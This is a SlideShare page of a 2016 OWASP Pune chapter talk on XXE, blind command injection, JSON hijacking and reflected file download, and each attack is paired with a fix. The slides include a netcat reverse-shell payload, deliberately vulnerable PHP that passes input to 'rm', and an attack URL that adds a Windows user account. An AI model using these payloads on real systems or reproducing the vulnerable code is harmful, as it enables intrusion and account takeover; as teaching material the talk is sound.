SlideShare a Scribd company logo

OWASP Pune Chapter : Dive Into The Profound Web Attacks

Download as PPTX, PDF
Narendra Bhati
Narendra Bhati

OWASP Pune Chapter 18th Feb 2016 At - Avaya India, Pune.

Technology
1 of 42
Narendra Bhati - Security Analyst narendra.bhati@outlook.com Dive Into The Profound Web Attacks OWASP Pune Chapter – 18th Feb 2016
Speaker: Narendra Bhati Security Analyst @Suma Soft Pvt. Ltd. – Pune Researcher & Part Time Bug Bounty Hunter Listed in HOF for reporting security Vulnerabilities like Facebook, Google, Mozilla, Twitter etc. Hold more then 12 CVE & 3 Zero days vulnerabilities. Blog – http://websecgeeks.com “Who Am I  - r00tsh3ll”
If you have any questions or query regarding the talk, Kindly note it down. So we can discuss it at the end. 3
Dive Into The Profound Web Attacks • XXE ( XML External Entity Injection) • Blind RCE ( Blind Remote/OS Command Execution ) • JSON Response Hijacking • Reflected File Download
• XXE ( XML External Entity Injection) 5
• XXE ( XML External Entity Injection) According To OWASP An XML External Entity attack is a type of an injection attack against an application that parses XML input. This attack occurs when XML input containing a reference to an external entity is processed by a weakly configured XML parser. This attack may lead to the disclosure of confidential data 6
• XXE ( XML External Entity Injection) Why XXE Take Place ? Failure to validate External XML Entity which gives an attacker the accessing internal resources/data 7
• XXE ( XML External Entity Injection) Lets Have A Demo !  8
• XXE ( XML External Entity Injection) Getting connection from target domain 9 Accessing internal directories. Doing brute forcing or anything we found a directory in localhost called “/betatesting/testing.php” which is a network utility. Invalid directory. Response with failed to load external entity. Valid directory. Response without failed to load external entity or some kind of difference in valid and invalid directory response..
• XXE ( XML External Entity Injection) 10 I am leaving the rest of the process, As per the “testing.php” response. We added a get parameter called “ping” and see we were to able to execute commands. This is a scenario, Where target system have some beta testing application which is under development or etc. You should figured out what you can do with XXE or any other vulnerability
• XXE ( XML External Entity Injection) Fixing The XXE Disable XML parser in order to prevent XXE For PHP : bool libxml_disable_entity_loader ([ bool $disable = true ] ) For .Net: settings.XmlResolver = null; Look for the other languages as well. 11
• XXE ( XML External Entity Injection) Fixing The XXE Disable XML parser in order to prevent XXE For PHP : bool libxml_disable_entity_loader ([ bool $disable = true ] ) For .Net: settings.XmlResolver = null; Look for the other languages as well. 12
• XXE ( XML External Entity Injection) Fixing The XXE Disable XML parser in order to prevent XXE For PHP : bool libxml_disable_entity_loader ([ bool $disable = true ] ) For .Net: settings.XmlResolver = null; Look for the other languages as well. 13
Blind RCE ( Blind Remote/OS Command Execution ) 14
Blind RCE ( Blind Remote/OS Command Execution ) According To Nature/Behaviour  Similar or Elder Brother Of Blind SQL Injection vulnerability. Command injection is an attack in which the goal is execution of arbitrary commands on the host operating system via a vulnerable application According To OWASP 15
Blind RCE ( Blind Remote/OS Command Execution ) Why RCE Take Place ? Missing/Lack of sanitization of user input, which will append at system shell while execution. 16
Blind RCE ( Blind Remote/OS Command Execution ) Ex. Vulnerable Code As PHP <?php print("Please specify the name of the file to delete"); print("<p>"); $file=$_GET['filename']; system("rm $file"); ?> Injection Point 17
Blind RCE ( Blind Remote/OS Command Execution ) Some Basic About Using Double Commands • A; B = Run A and then B, no matter success execution of A • A || B = Run B if A failed, No matter if B got failed, A will still run • A && B = Run B if A works, If A Failed B will not execute • A & B = Run B and then run A in background, If A failed B will still get executed • A | B = Run A and pass the output of A to B • A %0a B (Use full for web app) • $(nc –nv ip port –e /bin/bash) 18
Blind RCE ( Blind Remote/OS Command Execution ) Demo Time Normal RCE | Some Bypasses | Blind RCE [Low-Medium] 19
Blind RCE ( Blind Remote/OS Command Execution ) Detection On Time Delay Response 20 Response comes in 4 Sec Aprox. Response comes in 11 Sec Aprox.
Blind RCE ( Blind Remote/OS Command Execution ) 21 In demonstration, We are assuming that target server is configured in such a way that he will not send reverse connection using netcat -e option and we cant use wget also. Response from command “id” getting logged in our python simple http server Lets see are we able to access the /var/tmp folder.Yes we are because in python server we got the response as /var/tmp Using similar kind of aproach, We can interact with shell response. Remember we are not using netcat –e option for the response, But we are just piping the output to another machine
Blind RCE ( Blind Remote/OS Command Execution ) Fixing The Command Execution • The developer should scrub all input for malicious characters. • It is much easier to define the legal characters than the illegal characters. 22
JSON Response Hijacking 23
JSON Response Hijacking Similar to CSRF, This vulnerability basically based on Browsers Bug which allow an attacker to steal sensitive JSON response from victim authenticated session or there could be more interesting thing. According To Sources 24
JSON Response Hijacking JSON Hijacking Happened If Source - http://haacked.com/archive/2009/06/25/json-hijacking.aspx/ • returns sensitive data. • returns a JSON array. [ content type-json] • responds to GET requests. • the browser making the request has JavaScript enabled (the browser making the request supports the __defineSetter__ method. 25
JSON Response Hijacking Lets Dive Into The Demo 26
JSON Response Hijacking Fixing JSON Hijacking Source - http://haacked.com/archive/2009/06/25/json-hijacking.aspx/ • Only return JSON objects to POST requests. • Prevent the web browser from interpreting the JSON object as valid JavaScript code. • Implement CSRF protection random tokens for all JSON requests. 27
Reflected File Download 28
Reflected File Download According To Sources 29 RFD is a web attack vector that enables attackers to gain complete control over a victims machine by virtually downloading a file from a trusted domain. Recently found in Facebook & Google Etc by researchers. Source- https://www.blackhat.com/docs/eu-14/materials/eu-14-Hafif-Reflected-File-Download-A-New-Web-Attack-Vector.pdf
Reflected File Download Reflected: There should be reflection of the value given in the URL as response Filename: File name should allowing or characterized by great or excessive freedom of behavior which should also accept additional user control values and file type. Like application can accept filename between first slash “/” and “?” character. Ex. Code (PHP) (Will Not Work) Lets Separate Those Words 30
Reflected File Download Download : https://anyvulnerablewebsite.com/json;/maliciousfile.bat/.exe?download=anycomm and “malicious.bat/,exe“ So basically this is browser behavior that how he will handle the download process, Mention behavior is for chrome Expect other browsers. Other brewers may have different behavior for the same. Lets Separate Those Words 31
Reflected File Download 1. Attacker send a malicious URL to victim of trusted domain. Ex. http://anytrustedsite.com/apitest/search;setup.bat?term=f00b ar&callback=net user attacker attacker 2. Victim found the domain is trusted. So he will access the URL. 3. After clicking on the URL, The file will be downloaded and after executing that file, Some interesting thing will happened. ;) Attack Scenario 32
Reflected File Download Lets See A Demo 33
Reflected File Download As you can can see we having a web application. The value of download parameter is getting back in response without file name header. And the response is downloadable 34
Reflected File Download Now we are going to enter a file name in url, Because the response header don’t have the file name header. So we have chance that we can control the file name from URL it self. 35
Reflected File Download Now can craft a payload as input which will execute some system command on victim machine. As per the reflection we can separate out the rest of the value to perform a command execution 36
Reflected File Download After executing that file we have calc execution. 37
Reflected File Download Create some interesting payload. Before doing lets check out user accounts. 38
Reflected File Download After executing the downloaded file, We have an another user account called “attacker” 39
Reflected File Download Add - Content-Disposition: attachment; filename=anyfile.pdf/txt Don’t allow the application to take permissive input. Limit the callback function for “;:/” characters. Fixing The Reflected File Download 40
41 Source-http://www.gapingvoidart.com/gallery/images/142061/any-questions.gif?sw,605,476,0,0,100,16777215,368040352
Thanks, For listening peacefully  Kindly send me your feedback regarding the talk on – narendra.bhati@outlook.com It will help me to improve the presentation next time. 42

Recommended

Abusing Windows Opener To Bypass CSRF Protection
Abusing Windows Opener To Bypass CSRF ProtectionAbusing Windows Opener To Bypass CSRF Protection
Abusing Windows Opener To Bypass CSRF ProtectionNarendra Bhati
 
Club hack 2011 precon ctf walkthrough
Club hack 2011 precon ctf walkthroughClub hack 2011 precon ctf walkthrough
Club hack 2011 precon ctf walkthroughn|u - The Open Security Community
 
Secure Programming In Php
Secure Programming In PhpSecure Programming In Php
Secure Programming In PhpAkash Mahajan
 
Entity provider selection confusion attacks in JAX-RS applications
Entity provider selection confusion attacks in JAX-RS applicationsEntity provider selection confusion attacks in JAX-RS applications
Entity provider selection confusion attacks in JAX-RS applicationsMikhail Egorov
 
Intro to Php Security
Intro to Php SecurityIntro to Php Security
Intro to Php SecurityDave Ross
 
Unusual Web Bugs
Unusual Web BugsUnusual Web Bugs
Unusual Web Bugsamiable_indian
 
Case Study of Django: Web Frameworks that are Secure by Default
Case Study of Django: Web Frameworks that are Secure by DefaultCase Study of Django: Web Frameworks that are Secure by Default
Case Study of Django: Web Frameworks that are Secure by DefaultMohammed ALDOUB
 
Neat tricks to bypass CSRF-protection
Neat tricks to bypass CSRF-protectionNeat tricks to bypass CSRF-protection
Neat tricks to bypass CSRF-protectionMikhail Egorov
 

Recommended

Abusing Windows Opener To Bypass CSRF Protection
Abusing Windows Opener To Bypass CSRF ProtectionAbusing Windows Opener To Bypass CSRF Protection
Abusing Windows Opener To Bypass CSRF ProtectionNarendra Bhati
 
Club hack 2011 precon ctf walkthrough
Club hack 2011 precon ctf walkthroughClub hack 2011 precon ctf walkthrough
Club hack 2011 precon ctf walkthroughn|u - The Open Security Community
 
Secure Programming In Php
Secure Programming In PhpSecure Programming In Php
Secure Programming In PhpAkash Mahajan
 
Entity provider selection confusion attacks in JAX-RS applications
Entity provider selection confusion attacks in JAX-RS applicationsEntity provider selection confusion attacks in JAX-RS applications
Entity provider selection confusion attacks in JAX-RS applicationsMikhail Egorov
 
Intro to Php Security
Intro to Php SecurityIntro to Php Security
Intro to Php SecurityDave Ross
 
Unusual Web Bugs
Unusual Web BugsUnusual Web Bugs
Unusual Web Bugsamiable_indian
 
Case Study of Django: Web Frameworks that are Secure by Default
Case Study of Django: Web Frameworks that are Secure by DefaultCase Study of Django: Web Frameworks that are Secure by Default
Case Study of Django: Web Frameworks that are Secure by DefaultMohammed ALDOUB
 
Neat tricks to bypass CSRF-protection
Neat tricks to bypass CSRF-protectionNeat tricks to bypass CSRF-protection
Neat tricks to bypass CSRF-protectionMikhail Egorov
 
Top 10 Security Vulnerabilities (2006)
Top 10 Security Vulnerabilities (2006)Top 10 Security Vulnerabilities (2006)
Top 10 Security Vulnerabilities (2006)Susam Pal
 
Security In PHP Applications
Security In PHP ApplicationsSecurity In PHP Applications
Security In PHP ApplicationsAditya Mooley
 
Static Analysis: The Art of Fighting without Fighting
Static Analysis: The Art of Fighting without FightingStatic Analysis: The Art of Fighting without Fighting
Static Analysis: The Art of Fighting without FightingRob Ragan
 
Same Origin Policy Weaknesses
Same Origin Policy WeaknessesSame Origin Policy Weaknesses
Same Origin Policy Weaknesseskuza55
 
OAuth Hacks A gentle introduction to OAuth 2 and Apache Oltu
OAuth Hacks A gentle introduction to OAuth 2 and Apache OltuOAuth Hacks A gentle introduction to OAuth 2 and Apache Oltu
OAuth Hacks A gentle introduction to OAuth 2 and Apache OltuAntonio Sanso
 
Hacker's Practice Ground - Wall of Sheep workshops - Defcon 2015
Hacker's Practice Ground - Wall of Sheep workshops - Defcon 2015 Hacker's Practice Ground - Wall of Sheep workshops - Defcon 2015
Hacker's Practice Ground - Wall of Sheep workshops - Defcon 2015 lokeshpidawekar
 
Filter Evasion: Houdini on the Wire
Filter Evasion: Houdini on the WireFilter Evasion: Houdini on the Wire
Filter Evasion: Houdini on the WireRob Ragan
 
Django (Web Applications that are Secure by Default)
Django �(Web Applications that are Secure by Default�)Django �(Web Applications that are Secure by Default�)
Django (Web Applications that are Secure by Default)Kishor Kumar
 
Hacking Adobe Experience Manager sites
Hacking Adobe Experience Manager sitesHacking Adobe Experience Manager sites
Hacking Adobe Experience Manager sitesMikhail Egorov
 
Hunting for security bugs in AEM webapps
Hunting for security bugs in AEM webappsHunting for security bugs in AEM webapps
Hunting for security bugs in AEM webappsMikhail Egorov
 
Flashack
FlashackFlashack
Flashackn|u - The Open Security Community
 
Hack and Slash: Secure Coding
Hack and Slash: Secure CodingHack and Slash: Secure Coding
Hack and Slash: Secure CodingPrathan Phongthiproek
 
Examining And Bypassing The IE8 XSS Filter
Examining And Bypassing The IE8 XSS FilterExamining And Bypassing The IE8 XSS Filter
Examining And Bypassing The IE8 XSS Filterkuza55
 
Cracking into embedded devices and beyond
Cracking into embedded devices and beyondCracking into embedded devices and beyond
Cracking into embedded devices and beyondamiable_indian
 
How to Shot Web - Jason Haddix at DEFCON 23 - See it Live: Details in Descrip...
How to Shot Web - Jason Haddix at DEFCON 23 - See it Live: Details in Descrip...How to Shot Web - Jason Haddix at DEFCON 23 - See it Live: Details in Descrip...
How to Shot Web - Jason Haddix at DEFCON 23 - See it Live: Details in Descrip...bugcrowd
 
APIDOC In A Nutshell
APIDOC In A NutshellAPIDOC In A Nutshell
APIDOC In A NutshellBen Liu
 
Threat Hunting Web Shells Using Splunk
Threat Hunting Web Shells Using SplunkThreat Hunting Web Shells Using Splunk
Threat Hunting Web Shells Using Splunkjamesmbower
 
Web Security - OWASP - SQL injection & Cross Site Scripting XSS
Web Security - OWASP - SQL injection & Cross Site Scripting XSSWeb Security - OWASP - SQL injection & Cross Site Scripting XSS
Web Security - OWASP - SQL injection & Cross Site Scripting XSSIvan Ortega
 
secure php
secure phpsecure php
secure phpRiyad Bin Zaman
 
Web Hacking Series Part 4
Web Hacking Series Part 4Web Hacking Series Part 4
Web Hacking Series Part 4Aditya Kamat
 
XML Attack Surface - Pierre Ernst (OWASP Ottawa)
XML Attack Surface - Pierre Ernst (OWASP Ottawa)XML Attack Surface - Pierre Ernst (OWASP Ottawa)
XML Attack Surface - Pierre Ernst (OWASP Ottawa)OWASP Ottawa
 
XML & XPath Injections
XML & XPath InjectionsXML & XPath Injections
XML & XPath InjectionsAMol NAik
 

More Related Content

What's hot

Top 10 Security Vulnerabilities (2006)
Top 10 Security Vulnerabilities (2006)Top 10 Security Vulnerabilities (2006)
Top 10 Security Vulnerabilities (2006)Susam Pal
 
Security In PHP Applications
Security In PHP ApplicationsSecurity In PHP Applications
Security In PHP ApplicationsAditya Mooley
 
Static Analysis: The Art of Fighting without Fighting
Static Analysis: The Art of Fighting without FightingStatic Analysis: The Art of Fighting without Fighting
Static Analysis: The Art of Fighting without FightingRob Ragan
 
Same Origin Policy Weaknesses
Same Origin Policy WeaknessesSame Origin Policy Weaknesses
Same Origin Policy Weaknesseskuza55
 
OAuth Hacks A gentle introduction to OAuth 2 and Apache Oltu
OAuth Hacks A gentle introduction to OAuth 2 and Apache OltuOAuth Hacks A gentle introduction to OAuth 2 and Apache Oltu
OAuth Hacks A gentle introduction to OAuth 2 and Apache OltuAntonio Sanso
 
Hacker's Practice Ground - Wall of Sheep workshops - Defcon 2015
Hacker's Practice Ground - Wall of Sheep workshops - Defcon 2015 Hacker's Practice Ground - Wall of Sheep workshops - Defcon 2015
Hacker's Practice Ground - Wall of Sheep workshops - Defcon 2015 lokeshpidawekar
 
Filter Evasion: Houdini on the Wire
Filter Evasion: Houdini on the WireFilter Evasion: Houdini on the Wire
Filter Evasion: Houdini on the WireRob Ragan
 
Django (Web Applications that are Secure by Default)
Django �(Web Applications that are Secure by Default�)Django �(Web Applications that are Secure by Default�)
Django (Web Applications that are Secure by Default)Kishor Kumar
 
Hacking Adobe Experience Manager sites
Hacking Adobe Experience Manager sitesHacking Adobe Experience Manager sites
Hacking Adobe Experience Manager sitesMikhail Egorov
 
Hunting for security bugs in AEM webapps
Hunting for security bugs in AEM webappsHunting for security bugs in AEM webapps
Hunting for security bugs in AEM webappsMikhail Egorov
 
Examining And Bypassing The IE8 XSS Filter
Examining And Bypassing The IE8 XSS FilterExamining And Bypassing The IE8 XSS Filter
Examining And Bypassing The IE8 XSS Filterkuza55
 
Cracking into embedded devices and beyond
Cracking into embedded devices and beyondCracking into embedded devices and beyond
Cracking into embedded devices and beyondamiable_indian
 
How to Shot Web - Jason Haddix at DEFCON 23 - See it Live: Details in Descrip...
How to Shot Web - Jason Haddix at DEFCON 23 - See it Live: Details in Descrip...How to Shot Web - Jason Haddix at DEFCON 23 - See it Live: Details in Descrip...
How to Shot Web - Jason Haddix at DEFCON 23 - See it Live: Details in Descrip...bugcrowd
 
APIDOC In A Nutshell
APIDOC In A NutshellAPIDOC In A Nutshell
APIDOC In A NutshellBen Liu
 
Threat Hunting Web Shells Using Splunk
Threat Hunting Web Shells Using SplunkThreat Hunting Web Shells Using Splunk
Threat Hunting Web Shells Using Splunkjamesmbower
 
Web Security - OWASP - SQL injection & Cross Site Scripting XSS
Web Security - OWASP - SQL injection & Cross Site Scripting XSSWeb Security - OWASP - SQL injection & Cross Site Scripting XSS
Web Security - OWASP - SQL injection & Cross Site Scripting XSSIvan Ortega
 
Web Hacking Series Part 4
Web Hacking Series Part 4Web Hacking Series Part 4
Web Hacking Series Part 4Aditya Kamat
 

What's hot (20)

Top 10 Security Vulnerabilities (2006)
Top 10 Security Vulnerabilities (2006)Top 10 Security Vulnerabilities (2006)
Top 10 Security Vulnerabilities (2006)
 
Security In PHP Applications
Security In PHP ApplicationsSecurity In PHP Applications
Security In PHP Applications
 
Static Analysis: The Art of Fighting without Fighting
Static Analysis: The Art of Fighting without FightingStatic Analysis: The Art of Fighting without Fighting
Static Analysis: The Art of Fighting without Fighting
 
Same Origin Policy Weaknesses
Same Origin Policy WeaknessesSame Origin Policy Weaknesses
Same Origin Policy Weaknesses
 
OAuth Hacks A gentle introduction to OAuth 2 and Apache Oltu
OAuth Hacks A gentle introduction to OAuth 2 and Apache OltuOAuth Hacks A gentle introduction to OAuth 2 and Apache Oltu
OAuth Hacks A gentle introduction to OAuth 2 and Apache Oltu
 
Hacker's Practice Ground - Wall of Sheep workshops - Defcon 2015
Hacker's Practice Ground - Wall of Sheep workshops - Defcon 2015 Hacker's Practice Ground - Wall of Sheep workshops - Defcon 2015
Hacker's Practice Ground - Wall of Sheep workshops - Defcon 2015
 
Filter Evasion: Houdini on the Wire
Filter Evasion: Houdini on the WireFilter Evasion: Houdini on the Wire
Filter Evasion: Houdini on the Wire
 
Django (Web Applications that are Secure by Default)
Django �(Web Applications that are Secure by Default�)Django �(Web Applications that are Secure by Default�)
Django (Web Applications that are Secure by Default)
 
Hacking Adobe Experience Manager sites
Hacking Adobe Experience Manager sitesHacking Adobe Experience Manager sites
Hacking Adobe Experience Manager sites
 
Hunting for security bugs in AEM webapps
Hunting for security bugs in AEM webappsHunting for security bugs in AEM webapps
Hunting for security bugs in AEM webapps
 
Flashack
FlashackFlashack
Flashack
 
Hack and Slash: Secure Coding
Hack and Slash: Secure CodingHack and Slash: Secure Coding
Hack and Slash: Secure Coding
 
Examining And Bypassing The IE8 XSS Filter
Examining And Bypassing The IE8 XSS FilterExamining And Bypassing The IE8 XSS Filter
Examining And Bypassing The IE8 XSS Filter
 
Cracking into embedded devices and beyond
Cracking into embedded devices and beyondCracking into embedded devices and beyond
Cracking into embedded devices and beyond
 
How to Shot Web - Jason Haddix at DEFCON 23 - See it Live: Details in Descrip...
How to Shot Web - Jason Haddix at DEFCON 23 - See it Live: Details in Descrip...How to Shot Web - Jason Haddix at DEFCON 23 - See it Live: Details in Descrip...
How to Shot Web - Jason Haddix at DEFCON 23 - See it Live: Details in Descrip...
 
APIDOC In A Nutshell
APIDOC In A NutshellAPIDOC In A Nutshell
APIDOC In A Nutshell
 
Threat Hunting Web Shells Using Splunk
Threat Hunting Web Shells Using SplunkThreat Hunting Web Shells Using Splunk
Threat Hunting Web Shells Using Splunk
 
Web Security - OWASP - SQL injection & Cross Site Scripting XSS
Web Security - OWASP - SQL injection & Cross Site Scripting XSSWeb Security - OWASP - SQL injection & Cross Site Scripting XSS
Web Security - OWASP - SQL injection & Cross Site Scripting XSS
 
secure php
secure phpsecure php
secure php
 
Web Hacking Series Part 4
Web Hacking Series Part 4Web Hacking Series Part 4
Web Hacking Series Part 4
 

Viewers also liked

XML Attack Surface - Pierre Ernst (OWASP Ottawa)
XML Attack Surface - Pierre Ernst (OWASP Ottawa)XML Attack Surface - Pierre Ernst (OWASP Ottawa)
XML Attack Surface - Pierre Ernst (OWASP Ottawa)OWASP Ottawa
 
XML & XPath Injections
XML & XPath InjectionsXML & XPath Injections
XML & XPath InjectionsAMol NAik
 
Cybercrime in the Deep Web (BHEU 2015)
Cybercrime in the Deep Web (BHEU 2015)Cybercrime in the Deep Web (BHEU 2015)
Cybercrime in the Deep Web (BHEU 2015)Marco Balduzzi
 
600.412.Lecture02
600.412.Lecture02600.412.Lecture02
600.412.Lecture02ragibhasan
 
Backup-File Artifacts - OWASP Khartoum InfoSec Sessions 2016 - Mazin Ahmed
Backup-File Artifacts - OWASP Khartoum InfoSec Sessions 2016 - Mazin AhmedBackup-File Artifacts - OWASP Khartoum InfoSec Sessions 2016 - Mazin Ahmed
Backup-File Artifacts - OWASP Khartoum InfoSec Sessions 2016 - Mazin AhmedMazin Ahmed
 
HTTP Parameter Pollution Vulnerabilities in Web Applications (Black Hat EU 2011)
HTTP Parameter Pollution Vulnerabilities in Web Applications (Black Hat EU 2011)HTTP Parameter Pollution Vulnerabilities in Web Applications (Black Hat EU 2011)
HTTP Parameter Pollution Vulnerabilities in Web Applications (Black Hat EU 2011)Marco Balduzzi
 
Cloud computing security policy framework for mitigating denial of service at...
Cloud computing security policy framework for mitigating denial of service at...Cloud computing security policy framework for mitigating denial of service at...
Cloud computing security policy framework for mitigating denial of service at...Venkatesh Prabhu
 
Avian flu Type A-H5N1 epidemiological model: Puerto Rico as a case study
Avian flu Type A-H5N1 epidemiological model: Puerto Rico as a case studyAvian flu Type A-H5N1 epidemiological model: Puerto Rico as a case study
Avian flu Type A-H5N1 epidemiological model: Puerto Rico as a case studyMariangeles Rivera
 
Cctk support for setting hdd password
Cctk support for setting hdd passwordCctk support for setting hdd password
Cctk support for setting hdd passwordartisriva
 
HTTP(S)-Based Clustering for Assisted Cybercrime Investigations
HTTP(S)-Based Clustering for Assisted Cybercrime Investigations HTTP(S)-Based Clustering for Assisted Cybercrime Investigations
HTTP(S)-Based Clustering for Assisted Cybercrime InvestigationsMarco Balduzzi
 
Softworx Enterprise Asset Management 101 - Presentation Template
Softworx Enterprise Asset Management 101 - Presentation TemplateSoftworx Enterprise Asset Management 101 - Presentation Template
Softworx Enterprise Asset Management 101 - Presentation TemplateEnterprise Softworx Solutions
 
A New Form of Dos attack in Cloud
A New Form of Dos attack in CloudA New Form of Dos attack in Cloud
A New Form of Dos attack in CloudSanoj Kumar
 
HITB2012AMS - SatanCloud: A Journey Into the Privacy and Security Risks of Cl...
HITB2012AMS - SatanCloud: A Journey Into the Privacy and Security Risks of Cl...HITB2012AMS - SatanCloud: A Journey Into the Privacy and Security Risks of Cl...
HITB2012AMS - SatanCloud: A Journey Into the Privacy and Security Risks of Cl...Marco Balduzzi
 
Abusing Social Networks for Automated User Profiling
Abusing Social Networks for Automated User ProfilingAbusing Social Networks for Automated User Profiling
Abusing Social Networks for Automated User ProfilingMarco Balduzzi
 

Viewers also liked (20)

XML Attack Surface - Pierre Ernst (OWASP Ottawa)
XML Attack Surface - Pierre Ernst (OWASP Ottawa)XML Attack Surface - Pierre Ernst (OWASP Ottawa)
XML Attack Surface - Pierre Ernst (OWASP Ottawa)
 
XML & XPath Injections
XML & XPath InjectionsXML & XPath Injections
XML & XPath Injections
 
Cybercrime in the Deep Web (BHEU 2015)
Cybercrime in the Deep Web (BHEU 2015)Cybercrime in the Deep Web (BHEU 2015)
Cybercrime in the Deep Web (BHEU 2015)
 
Personal informatic
Personal informaticPersonal informatic
Personal informatic
 
600.412.Lecture02
600.412.Lecture02600.412.Lecture02
600.412.Lecture02
 
Backup-File Artifacts - OWASP Khartoum InfoSec Sessions 2016 - Mazin Ahmed
Backup-File Artifacts - OWASP Khartoum InfoSec Sessions 2016 - Mazin AhmedBackup-File Artifacts - OWASP Khartoum InfoSec Sessions 2016 - Mazin Ahmed
Backup-File Artifacts - OWASP Khartoum InfoSec Sessions 2016 - Mazin Ahmed
 
HTTP Parameter Pollution Vulnerabilities in Web Applications (Black Hat EU 2011)
HTTP Parameter Pollution Vulnerabilities in Web Applications (Black Hat EU 2011)HTTP Parameter Pollution Vulnerabilities in Web Applications (Black Hat EU 2011)
HTTP Parameter Pollution Vulnerabilities in Web Applications (Black Hat EU 2011)
 
Cloud computing security policy framework for mitigating denial of service at...
Cloud computing security policy framework for mitigating denial of service at...Cloud computing security policy framework for mitigating denial of service at...
Cloud computing security policy framework for mitigating denial of service at...
 
Possessive adjectives
Possessive adjectivesPossessive adjectives
Possessive adjectives
 
Avian flu Type A-H5N1 epidemiological model: Puerto Rico as a case study
Avian flu Type A-H5N1 epidemiological model: Puerto Rico as a case studyAvian flu Type A-H5N1 epidemiological model: Puerto Rico as a case study
Avian flu Type A-H5N1 epidemiological model: Puerto Rico as a case study
 
Family tree
Family treeFamily tree
Family tree
 
Adauga un text
Adauga un textAdauga un text
Adauga un text
 
Cctk support for setting hdd password
Cctk support for setting hdd passwordCctk support for setting hdd password
Cctk support for setting hdd password
 
HTTP(S)-Based Clustering for Assisted Cybercrime Investigations
HTTP(S)-Based Clustering for Assisted Cybercrime Investigations HTTP(S)-Based Clustering for Assisted Cybercrime Investigations
HTTP(S)-Based Clustering for Assisted Cybercrime Investigations
 
Softworx Enterprise Asset Management 101 - Presentation Template
Softworx Enterprise Asset Management 101 - Presentation TemplateSoftworx Enterprise Asset Management 101 - Presentation Template
Softworx Enterprise Asset Management 101 - Presentation Template
 
A New Form of Dos attack in Cloud
A New Form of Dos attack in CloudA New Form of Dos attack in Cloud
A New Form of Dos attack in Cloud
 
HITB2012AMS - SatanCloud: A Journey Into the Privacy and Security Risks of Cl...
HITB2012AMS - SatanCloud: A Journey Into the Privacy and Security Risks of Cl...HITB2012AMS - SatanCloud: A Journey Into the Privacy and Security Risks of Cl...
HITB2012AMS - SatanCloud: A Journey Into the Privacy and Security Risks of Cl...
 
Christmas
ChristmasChristmas
Christmas
 
Abusing Social Networks for Automated User Profiling
Abusing Social Networks for Automated User ProfilingAbusing Social Networks for Automated User Profiling
Abusing Social Networks for Automated User Profiling
 
Pentru tine
Pentru tinePentru tine
Pentru tine
 

Similar to OWASP Pune Chapter : Dive Into The Profound Web Attacks

Php vulnerability presentation
Php vulnerability presentationPhp vulnerability presentation
Php vulnerability presentationSqa Enthusiast
 
BlackHat EU 2012 - Zhenhua Liu - Breeding Sandworms: How To Fuzz Your Way Out...
BlackHat EU 2012 - Zhenhua Liu - Breeding Sandworms: How To Fuzz Your Way Out...BlackHat EU 2012 - Zhenhua Liu - Breeding Sandworms: How To Fuzz Your Way Out...
BlackHat EU 2012 - Zhenhua Liu - Breeding Sandworms: How To Fuzz Your Way Out...MindShare_kk
 
Session on Selenium 4 : What’s coming our way? by Hitesh Prajapati
Session on Selenium 4 : What’s coming our way? by Hitesh PrajapatiSession on Selenium 4 : What’s coming our way? by Hitesh Prajapati
Session on Selenium 4 : What’s coming our way? by Hitesh PrajapatiAgile Testing Alliance
 
Selenium 4 - What's coming our way - v1.0.pptx
Selenium 4 - What's coming our way - v1.0.pptxSelenium 4 - What's coming our way - v1.0.pptx
Selenium 4 - What's coming our way - v1.0.pptxHitesh Prajapati
 
Web-servers & Application Hacking
Web-servers & Application HackingWeb-servers & Application Hacking
Web-servers & Application HackingRaghav Bisht
 
SSRF For Bug Bounties
SSRF For Bug BountiesSSRF For Bug Bounties
SSRF For Bug BountiesOWASP Nagpur
 
Window Shopping Browser - Bug Hunting in 2012
Window Shopping Browser - Bug Hunting in 2012Window Shopping Browser - Bug Hunting in 2012
Window Shopping Browser - Bug Hunting in 2012Roberto Suggi Liverani
 
Secure programming with php
Secure programming with phpSecure programming with php
Secure programming with phpMohmad Feroz
 
Static Code Analysis PHP[tek] 2023
Static Code Analysis PHP[tek] 2023Static Code Analysis PHP[tek] 2023
Static Code Analysis PHP[tek] 2023Scott Keck-Warren
 
BSidesDC 2016 Beyond Automated Testing
BSidesDC 2016 Beyond Automated TestingBSidesDC 2016 Beyond Automated Testing
BSidesDC 2016 Beyond Automated TestingAndrew McNicol
 
Abusing Exploiting and Pwning with Firefox Addons
Abusing Exploiting and Pwning with Firefox AddonsAbusing Exploiting and Pwning with Firefox Addons
Abusing Exploiting and Pwning with Firefox AddonsAjin Abraham
 
"15 Technique to Exploit File Upload Pages", Ebrahim Hegazy
"15 Technique to Exploit File Upload Pages", Ebrahim Hegazy"15 Technique to Exploit File Upload Pages", Ebrahim Hegazy
"15 Technique to Exploit File Upload Pages", Ebrahim HegazyHackIT Ukraine
 
Hadoop: Code Injection, Distributed Fault Injection
Hadoop: Code Injection, Distributed Fault InjectionHadoop: Code Injection, Distributed Fault Injection
Hadoop: Code Injection, Distributed Fault InjectionCloudera, Inc.
 
Reversing & Malware Analysis Training Part 9 - Advanced Malware Analysis
Reversing & Malware Analysis Training Part 9 - Advanced Malware AnalysisReversing & Malware Analysis Training Part 9 - Advanced Malware Analysis
Reversing & Malware Analysis Training Part 9 - Advanced Malware Analysissecurityxploded
 
Take control. write a plugin. part II
Take control. write a plugin. part IITake control. write a plugin. part II
Take control. write a plugin. part IIBaruch Sadogursky
 
Owasp AppSecEU 2015 - BeEF Session
Owasp AppSecEU 2015 - BeEF SessionOwasp AppSecEU 2015 - BeEF Session
Owasp AppSecEU 2015 - BeEF SessionBart Leppens
 
Real-World WebAppSec Flaws - Examples and Countermeasues
Real-World WebAppSec Flaws - Examples and CountermeasuesReal-World WebAppSec Flaws - Examples and Countermeasues
Real-World WebAppSec Flaws - Examples and Countermeasuesvolvent
 

Similar to OWASP Pune Chapter : Dive Into The Profound Web Attacks (20)

Php vulnerability presentation
Php vulnerability presentationPhp vulnerability presentation
Php vulnerability presentation
 
BlackHat EU 2012 - Zhenhua Liu - Breeding Sandworms: How To Fuzz Your Way Out...
BlackHat EU 2012 - Zhenhua Liu - Breeding Sandworms: How To Fuzz Your Way Out...BlackHat EU 2012 - Zhenhua Liu - Breeding Sandworms: How To Fuzz Your Way Out...
BlackHat EU 2012 - Zhenhua Liu - Breeding Sandworms: How To Fuzz Your Way Out...
 
Session on Selenium 4 : What’s coming our way? by Hitesh Prajapati
Session on Selenium 4 : What’s coming our way? by Hitesh PrajapatiSession on Selenium 4 : What’s coming our way? by Hitesh Prajapati
Session on Selenium 4 : What’s coming our way? by Hitesh Prajapati
 
